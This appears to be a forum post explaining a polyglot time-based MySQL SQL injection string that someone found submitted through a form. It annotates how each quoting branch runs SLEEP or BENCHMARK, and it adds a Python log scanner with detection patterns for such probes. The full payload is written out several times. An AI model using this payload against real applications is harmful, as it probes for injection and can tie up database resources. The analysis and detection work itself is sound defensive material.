
MySQL: Does anyone know this kind of SQL injection?


Someone injected the following via an unchecked text field in a form:

IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR"*/

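It is designed to hit the CPU hard on older versions of MySQL, and on newer versions of MySQL to hold the connection open by sleeping for 5 seconds, regardless of whether the input box's value is unquoted, single-quoted, or double-quoted.

In each case, if the application is vulnerable to SQL injection, a denial-of-service attack can potentially be carried out, because holding connections open for a long time can exhaust server resources/available connections.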

-- if unquoted, it sees this:
IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))
-- ...and then ignores the rest, which appears commented:
/*


-- If it's single-quoted, it doesn't see the comment,
-- rather, it terminates the single quote:
'
-- ...and then sees this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
-- ...and then sees the next part as a single-quoted string terminated in the client
'|


-- but if it's a double-quoted string, it sees the end double-quote:
"
-- ...and runs this:
XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5)))OR
-- ...and then opens a double quote to be closed in the client
"
-- This is the end of the comment opened in the case of the unquoted client string.
*/
I think it slows things down when it executes, and if it is executed too many times your database will become inaccessible / very slow. A kind of DoS attack.
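
For triage on the defending side, the probe's own 5-second sleep tells you whether a parameter actually evaluated it. The following is an added example, not code from the original thread: it scans access-log lines for `SLEEP`/`BENCHMARK` in the decoded query string and compares the response time with the requested sleep. The log format, sample lines, paths and function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import quote, unquote_plus

# The unquoted branch of the probe shown on this page, URL-encoded as a client would send it.
PROBE = quote("IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2600000,SHA1(0xDEADBEEF)),SLEEP(5))", safe="(),@")

# Constructed sample log lines (assumed format: ip "METHOD target PROTO" status seconds).
SAMPLE_LOG = [
    '203.0.113.7 "GET /search?q=shoes HTTP/1.1" 200 0.041',
    f'203.0.113.9 "GET /item?id={PROBE} HTTP/1.1" 200 5.012',
    f'203.0.113.9 "GET /news?cat=%27XOR({PROBE})OR%27 HTTP/1.1" 200 0.038',
    '198.51.100.4 "GET /blog/sleep(5)-tips HTTP/1.1" 200 0.020',
]

LINE_RE = re.compile(r'^(\S+) "(\S+) (\S+) [^"]*" (\d{3}) ([\d.]+)$')
# Timing primitives used by the probe, with their first numeric argument.
PROBE_RE = re.compile(r"\b(SLEEP|BENCHMARK)\s*\(\s*(\d+)", re.IGNORECASE)


def classify(line):
    """Return a finding for a request carrying a timing probe, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, _method, target, _status, elapsed = m.groups()
    path, _, query = target.partition("?")
    # Decode twice so double-encoded payloads are also seen.
    decoded = unquote_plus(unquote_plus(query))
    hits = PROBE_RE.findall(decoded)
    if not hits:
        return None
    sleeps = [int(n) for fn, n in hits if fn.upper() == "SLEEP"]
    # If the response took at least as long as the requested SLEEP, the
    # expression was probably evaluated by the database.
    confirmed = bool(sleeps) and float(elapsed) >= min(sleeps)
    return {"ip": ip, "path": path,
            "verdict": "delay-confirmed" if confirmed else "probe-only"}


def scan(lines):
    """Classify every line and keep only the findings."""
    return [f for f in map(classify, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A `delay-confirmed` endpoint should be reviewed first for string-built SQL and moved to parameterized queries. Access logs only carry query strings, so a form submitted by POST needs request-body logging for the same check.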